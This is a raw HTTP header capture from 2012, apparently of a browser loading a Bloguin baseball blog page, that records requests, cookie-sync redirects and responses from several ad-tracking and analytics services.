Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=135320224335022b7e1619fcd&amp;rand=1353202243350&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Cookie: ljt_reader=ef7a042fe53a26bce537c3d018177452; ljtrtb=eJyrVjJUslIyNrewMDEysTAyNzcyMjYzsLA0VaoFAFClBds%3D
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Sun, 18 Nov 2012 01:30:46 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, max-age=86400, must-revalidate
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: ljtrtb=eJwNybsNwDAIBcBdqINkPobnbIOwskSU3ePmmntJ6CZLwNWhmaoWA2vSRXZmjoKVPQz1Zl%2BHihbGVoHPRqTR9wMabw%2Fm; expires=Mon, 18-Nov-2013 01:30:46 GMT; path=/; domain=.lijit.com
Content-Length: 43
Expires: Mon, 19 Nov 2012 01:30:46 GMT
Connection: close
GET /lijit_sync HTTP/1.1

Host: ca.lijit.pixel.invitemedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=135320224335022b7e1619fcd&amp;rand=1353202243350&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Cookie: uid=f45883da-a5b2-4229-92e5-ccb518d47872; dp_rec=&quot;{\&quot;6\&quot;:1353202243+\&quot;4\&quot;:1353202240}&quot;; camp_freq_p1=&quot;eJzjkuH4sJFfgEni8JcFrawKTBoHpi9rZTVgsjgA4gMAnXMLAw==&quot;; exchange_uid=eyI3IjpbIjc1NzdDNERBLTM5OTUtNDE1My05QTBCLTdDOTkyN0JGMTAxMyIsNzM0ODI1XSwiNCI6WyJDQUVTRUU1Q2Q0Umh0eUxPeDV6YXVlanVMVU0iLDczNDgyNV19; impressions_p1=&quot;eJzjcuRgF1IxMHR2tTQxMNc1MTU11TUxsDTUtTSzMNF1MTI0N3Q2c3R0MrSUOPBlQSurwtEvRRozfnMY9K5jtViuHdHzkJELbISpmYGbkaWBk66bkYWBromzkYuuo5Gli66zsYWLuYGRkZmlmZnEYbAR7X8KNGahGAEAMeQm4A==&quot;; io_freq_p1=&quot;eJzjkuF4eYtRgEni8JcFrawKTBoHpi9rZTVgsjgA4gMAn4ILFw==&quot;; partnerUID=&quot;eyI4NCI6WyI1RldPd3k5OTk5ZTIxdkN4Iix0cnVlXX0=&quot;
HTTP/1.1 302 Found

HTTP/1.1 302 Found
Date: Sun, 18 Nov 2012 01:30:46 GMT
Pragma: no-cache
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC&quot;
Cache-Control: no-cache
Location: http://ce.lijit.com/merge?3pid=f45883da-a5b2-4229-92e5-ccb518d47872&amp;pid=11
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)
Set-Cookie: impressions=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT clicks=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT segments=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT frequency=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT io_frequency=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT
GET /5/track_targeting/124112090/x95/USNetwork/track_targeting/reporting/77352b4d336c436f4f6b594142396245?XE&MAX-Site=bloguin&MAX-Campaign=USNetwork/MAX_US_GeneralInterest_Tier03_300x250_MAX_Campaign&XE HTTP/1.1

Host: network.realmedia.com
GET /5/track_targeting/124112090/x95/USNetwork/track_targeting/reporting/77352b4d336c436f4f6b594142396245?XE&amp;MAX-Site=bloguin&amp;MAX-Campaign=USNetwork/MAX_US_GeneralInterest_Tier03_300x250_MAX_Campaign&amp;XE HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/bloguin/ros/300x250/sx/ss/a@x15
Cookie: OAX=w5+M3lCoOkYAB9bE; RMFD=011TZtigO101GLK; NSC_o1efm_qppm_iuuq=ffffffff09419e3145525d5f4f58455e445a4a423660
HTTP/1.1 302 Found

Content-Type: text/html; charset=iso-8859-1
Date: Sun, 18 Nov 2012 01:30:46 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP=&quot;NON NID PSAa PSDa OUR IND UNI COM NAV STA&quot;,policyref=&quot;/w3c/p3p.xml&quot;
Pragma: no-cache
Cache-Control: no-cache
Location: http://imagen01.247realmedia.com/0/default/empty.gif
Content-Length: 323
Keep-Alive: timeout=60
Connection: Keep-Alive
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3145525d5f4f58455e445a4a423660;expires=Sun, 18-Nov-2012 01:31:46 GMT;path=/;httponly
GET /merge?pid=12&3pid=5858721859426781856 HTTP/1.1

Host: ce.lijit.com
GET /merge?pid=12&amp;3pid=5858721859426781856 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=135320224335022b7e1619fcd&amp;rand=1353202243350&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Cookie: ljt_reader=ef7a042fe53a26bce537c3d018177452; ljtrtb=eJyrVjJUslIyNrewMDEysTAyNzcyMjYzsLA0VaoFAFClBds%3D
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Sun, 18 Nov 2012 01:30:46 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, max-age=86400, must-revalidate
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: ljtrtb=eJwNybENACEMA8BdXH9BTBIbVkPs%2FnQn3UFgY8pOpimRs4dX4UPwVbkshmslW35o3B8vKwsl; expires=Mon, 18-Nov-2013 01:30:46 GMT; path=/; domain=.lijit.com
Content-Length: 43
Expires: Mon, 19 Nov 2012 01:30:46 GMT
Connection: close
GET /cms?min_age=2&rurl=http://ib.adnxs.com/mapuid?member=1471%26user=[MOOKIE] HTTP/1.1

Host: t.mookie1.com
GET /cms?min_age=2&amp;rurl=http://ib.adnxs.com/mapuid?member=1471%26user=[MOOKIE] HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/bloguin/ros/300x250/sx/ss/a@x15
Cookie: id=4612108592868098223; mdata=1|4612108592868098223|1353202246
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Sun, 18 Nov 2012 01:30:47 GMT
Server: Apache/2.0.52 (Red Hat) mod_perl/1.99_16 Perl/v5.8.5 mod_python/3.1.3 Python/2.3.4 mod_ssl/2.0.52 OpenSSL/0.9.7a
Content-Length: 35
Connection: close
GET /rsp?min_age=2&rurl=http://network.realmedia.com/RealMedia/ads/adstream.cap?c=mooker%26e=7d%26va=[MOOKIE]_[MOOKIE_AGE] HTTP/1.1

Host: t.mookie1.com
GET /rsp?min_age=2&amp;rurl=http://network.realmedia.com/RealMedia/ads/adstream.cap?c=mooker%26e=7d%26va=[MOOKIE]_[MOOKIE_AGE] HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/bloguin/ros/300x250/sx/ss/a@x15
Cookie: id=4612108592868098223; mdata=1|4612108592868098223|1353202246
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Sun, 18 Nov 2012 01:30:47 GMT
Server: Apache/2.0.52 (Red Hat) mod_perl/1.99_16 Perl/v5.8.5 mod_python/3.1.3 Python/2.3.4 mod_ssl/2.0.52 OpenSSL/0.9.7a
Content-Length: 35
Connection: close
GET /do-association?return=ctxweb&can=10 HTTP/1.1

Host: matcher-cwb.bidder7.mookie1.com
GET /do-association?return=ctxweb&amp;can=10 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: id=4612108592868098223; mdata=1|4612108592868098223|1353202246
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Sun, 18 Nov 2012 01:30:47 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-cache,no-store,private
Pragma: no-cache
Expires: Fri, 30 Oct 1998 14:19:41 GMT
P3P: CP=&quot;NON NID PSAa PSDa OUR IND UNI COM NAV STA&quot;,policyref=&quot;/w3c/p3p.xml&quot;
Content-Length: 43
Keep-Alive: timeout=1, max=721
Connection: Keep-Alive
GET /bh/visitormatch?tag=66900&pid=520266 HTTP/1.1

Host: bh.contextweb.com
GET /bh/visitormatch?tag=66900&amp;pid=520266 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: C2W4=3hj8VJekE1xLFEu52vJsr0gR__DD7av_eKsLGmaFwbkP3DUjJz8gRIA; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353202367221; V=A4M4pJeeQdJ7; vf=3; wf=0; pb_rtb_ev=2-530731..0.0.1353202242915|535461.3788424827722360895.0.0.1353202243723|531399..0.0.1353202242915|530912..0.0.1353202242915|535495..0.0.1353202242915|540281..0.0.1353202242915|534301.22f88a08-e2e1-46da-a1e0-ae6bcb5f1661.0.0.1353202245508|535393..0.0.1353202242915|537085..0.0.1353202242915|541254..0.0.1353202242915|536088..0.0.1353202242915|543921..0.0.1353202242915|538569.f45883da-a5b2-4229-92e5-ccb518d47872.0.0.1353202243267|545979..0.0.1353202242915|531292.NE-00000002579495986.0.0.1353202245133|535039.125566b7-7167-49cb-824d-ca43d86c9ec7.0.0.1353202244248|543604..0.0.1353202242915|530739.50a83a3f-824c-494c-a6c1-8d21845c8673.0.0.1353202243485|537583.c85b91d8-7a9c-4a22-b1a8-e4968e393975.0.0.1353202246546|547259..0.0.1353202242915; 66900_728X90__POSUNKNOWNXUNKNOWN=1353202372225
HTTP/1.1 200 OK

Content-Type: text/html;charset=ISO-8859-1
Cache-Control: private, max-age=0, no-cache, no-store
Content-Language: en-US
CW-Server: ip-10-37-63-220
Date: Sun, 18 Nov 2012 01:30:46 GMT
Expires: -1
P3P: policyref=&quot;/bh/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Server: GlassFish v3
Set-Cookie: V=A4M4pJeeQdJ7; Domain=.contextweb.com; Expires=Wed, 13-Nov-2013 01:30:47 GMT; Path=/ pb_rtb_ev=2-530731..0.0.1353202242915|535461.3788424827722360895.0.0.1353202243723|531399..0.0.1353202242915|530912..0.0.1353202242915|535495..0.0.1353202242915|540281..0.0.1353202242915|534301.22f88a08-e2e1-46da-a1e0-ae6bcb5f1661.0.0.1353202245508|535393..0.0.1353202242915|537085..0.0.1353202242915|541254..0.0.1353202242915|536088..0.0.1353202242915|543921..0.0.1353202242915|538569.f45883da-a5b2-4229-92e5-ccb518d47872.0.0.1353202243267|545979..0.0.1353202242915|531292.NE-00000002579495986.0.0.1353202245133|535039.125566b7-7167-49cb-824d-ca43d86c9ec7.0.0.1353202244248|543604..0.0.1353202242915|530739.50a83a3f-824c-494c-a6c1-8d21845c8673.0.0.1353202243485|537583.c85b91d8-7a9c-4a22-b1a8-e4968e393975.0.0.1353202246546|547259..0.0.1353202242915; Domain=.contextweb.com; Expires=Mon, 18-Nov-2013 01:30:47 GMT; Path=/
Transfer-Encoding: chunked
Connection: keep-alive
GET /meter.asp?site=s52bloguinbaseball&refer=http%3A//www.shinynylonarts.com/&ip=195.159.140.222&w=1176&h=885&clr=24&tzo=-60&lang=en-US&pg=http%3A//fenwaywest.com/media/index.php&js=1&rnd=0.9304050916620044&zyxver=1.120524 HTTP/1.1

Host: s21.sitemeter.com
GET /meter.asp?site=s52bloguinbaseball&amp;refer=http%3A//www.shinynylonarts.com/&amp;ip=195.159.140.222&amp;w=1176&amp;h=885&amp;clr=24&amp;tzo=-60&amp;lang=en-US&amp;pg=http%3A//fenwaywest.com/media/index.php&amp;js=1&amp;rnd=0.9304050916620044&amp;zyxver=1.120524 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: IP=195%2E159%2E140%2E222
HTTP/1.1 301 Moved Permanently

Content-Type: text/html
Content-Length: 409
Location: http://b21.sitemeter.com/meter.asp?site=s52bloguinbaseball&amp;refer=http%3A//www.shinynylonarts.com/&amp;ip=195.159.140.222&amp;w=1176&amp;h=885&amp;clr=24&amp;tzo=-60&amp;lang=en-US&amp;pg=http%3A//fenwaywest.com/media/index.php&amp;js=1&amp;rnd=0.9304050916620044&amp;zyxver=1.120524
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 18 Nov 2012 01:30:35 GMT
GET /?y=3&t=h&u=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&r=http%3A%2F%2Fwww.shinynylonarts.com%2F HTTP/1.1

Host: dg.specificclick.net
GET /?y=3&amp;t=h&amp;u=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;r=http%3A%2F%2Fwww.shinynylonarts.com%2F HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/html;charset=ISO-8859-1
Server: WebStar 1.0
Set-Cookie: ug=rxHCc85x7xfQVC; Domain=.specificclick.net; Expires=Fri, 17-Nov-2017 01:30:47 GMT; Path=/
P3P: CP=&quot;NOI DSP COR DEVa TAIa OUR BUS UNI NAV&quot;
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Transfer-Encoding: chunked
Date: Sun, 18 Nov 2012 01:30:46 GMT
GET /meter.asp?site=s27fenwaywest&refer=http%3A//www.shinynylonarts.com/&ip=195.159.140.222&w=1176&h=885&clr=24&tzo=-60&lang=en-US&pg=http%3A//fenwaywest.com/media/index.php&js=1&rnd=0.3827459020866242&zyxver=1.120524 HTTP/1.1

Host: s27.sitemeter.com
GET /meter.asp?site=s27fenwaywest&amp;refer=http%3A//www.shinynylonarts.com/&amp;ip=195.159.140.222&amp;w=1176&amp;h=885&amp;clr=24&amp;tzo=-60&amp;lang=en-US&amp;pg=http%3A//fenwaywest.com/media/index.php&amp;js=1&amp;rnd=0.3827459020866242&amp;zyxver=1.120524 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: IP=195%2E159%2E140%2E222
HTTP/1.1 301 Moved Permanently

Content-Type: text/html
Content-Length: 404
Location: http://b27.sitemeter.com/meter.asp?site=s27fenwaywest&amp;refer=http%3A//www.shinynylonarts.com/&amp;ip=195.159.140.222&amp;w=1176&amp;h=885&amp;clr=24&amp;tzo=-60&amp;lang=en-US&amp;pg=http%3A//fenwaywest.com/media/index.php&amp;js=1&amp;rnd=0.3827459020866242&amp;zyxver=1.120524
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 18 Nov 2012 01:30:35 GMT
GET /widgets/tweet_button.1352365724.html HTTP/1.1

Host: platform.twitter.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=315569260
Last-Modified: Thu, 08 Nov 2012 09:16:01 GMT
Etag: &quot;e0131ea3511ed24fa4217f03897ea418&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 22643
Date: Sun, 18 Nov 2012 01:30:47 GMT
Connection: keep-alive
P3P: CP=&quot;CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT&quot;
GET /navigation/blogimages/baseball/theoutsidecorner.png HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/png
Date: Sun, 18 Nov 2012 01:30:47 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 21 Sep 2012 01:09:46 GMT
Etag: &quot;226aed-727c-4ca2be548ca80&quot;
Accept-Ranges: bytes
Content-Length: 29308
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
GET /creatives/BackupTags/520266/15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html HTTP/1.1

Host: akamai-media.contextweb.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: C2W4=3hj8VJekE1xLFEu52vJsr0gR__DD7av_eKsLGmaFwbkP3DUjJz8gRIA; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353202367221; V=A4M4pJeeQdJ7; vf=3; wf=0; pb_rtb_ev=2-530731..0.0.1353202242915|535461.3788424827722360895.0.0.1353202243723|531399..0.0.1353202242915|530912..0.0.1353202242915|535495..0.0.1353202242915|540281..0.0.1353202242915|534301.22f88a08-e2e1-46da-a1e0-ae6bcb5f1661.0.0.1353202245508|535393..0.0.1353202242915|537085..0.0.1353202242915|541254..0.0.1353202242915|536088..0.0.1353202242915|543921..0.0.1353202242915|538569.f45883da-a5b2-4229-92e5-ccb518d47872.0.0.1353202243267|545979..0.0.1353202242915|531292.NE-00000002579495986.0.0.1353202245133|535039.125566b7-7167-49cb-824d-ca43d86c9ec7.0.0.1353202244248|543604..0.0.1353202242915|530739.50a83a3f-824c-494c-a6c1-8d21845c8673.0.0.1353202243485|537583.c85b91d8-7a9c-4a22-b1a8-e4968e393975.0.0.1353202246546|547259..0.0.1353202242915; 66900_728X90__POSUNKNOWNXUNKNOWN=1353202372225
HTTP/1.1 200 OK

Content-Type: text/html
Last-Modified: Tue, 25 Sep 2012 16:55:42 GMT
Accept-Ranges: bytes
Etag: &quot;0bbf3983e9bcd1:0&quot;
Server: Microsoft-IIS/7.5
CW-Server: lga-app1300
ntCoent-Length: 140
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Content-Encoding: gzip
Content-Length: 140
Vary: Accept-Encoding
Cache-Control: private, max-age=859
Date: Sun, 18 Nov 2012 01:30:47 GMT
Connection: keep-alive
GET /navigation/blogimages/football/thisgivensunday.png HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/png
Date: Sun, 18 Nov 2012 01:30:47 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 21 Sep 2012 01:10:02 GMT
Etag: &quot;226b3a-4a3f-4ca2be63cee80&quot;
Accept-Ranges: bytes
Content-Length: 19007
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
GET /navigation/blogimages/basketball/crossoverchronicles.png HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/png
Date: Sun, 18 Nov 2012 01:30:47 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 21 Sep 2012 01:09:48 GMT
Etag: &quot;226af6-b7c1-4ca2be5674f00&quot;
Accept-Ranges: bytes
Content-Length: 47041
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
GET /navigation/js/main.js?_=1353202246995 HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Sun, 18 Nov 2012 01:30:47 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 21 Sep 2012 02:30:11 GMT
Etag: &quot;226b96-703-4ca2d04e072c0&quot;
Accept-Ranges: bytes
Content-Length: 1795
Keep-Alive: timeout=5, max=499
Connection: Keep-Alive
GET /navigation/images/logo.png HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bloguinmedia.com/navigation/css/main.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Sun, 18 Nov 2012 01:30:47 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 21 Sep 2012 01:10:15 GMT
Etag: &quot;226b86-65c-4ca2be7034bc0&quot;
Accept-Ranges: bytes
Content-Length: 1628
Keep-Alive: timeout=5, max=499
Connection: Keep-Alive
GET /fr/epx.gif HTTP/1.1

Host: px.owneriq.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
HTTP/1.1 200 OK

Content-Type: image/gif
Server: Apache/2.2.3 (CentOS)
Content-Length: 43
X-Powered-By: PHP/5.2.17
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Cache-Control: max-age=29383
Expires: Sun, 18 Nov 2012 09:40:30 GMT
Date: Sun, 18 Nov 2012 01:30:47 GMT
Connection: keep-alive
GET /cxweb_sync?ul_cb=1& HTTP/1.1

Host: t.pswec.com
GET /cxweb_sync?ul_cb=1&amp; HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: tuuid=ee20756b-05a3-42ba-b35a-684fe20ce5b2
HTTP/1.1 200 OK

Content-Type: image/gif
P3P: CP=&quot;NON DSP ADMo DEVo TAIo PSAo PSDo IVAo IVDo CONo OUR UNRo IND ONL UNI PUR COM NAV INT DEM STA PRE&quot;
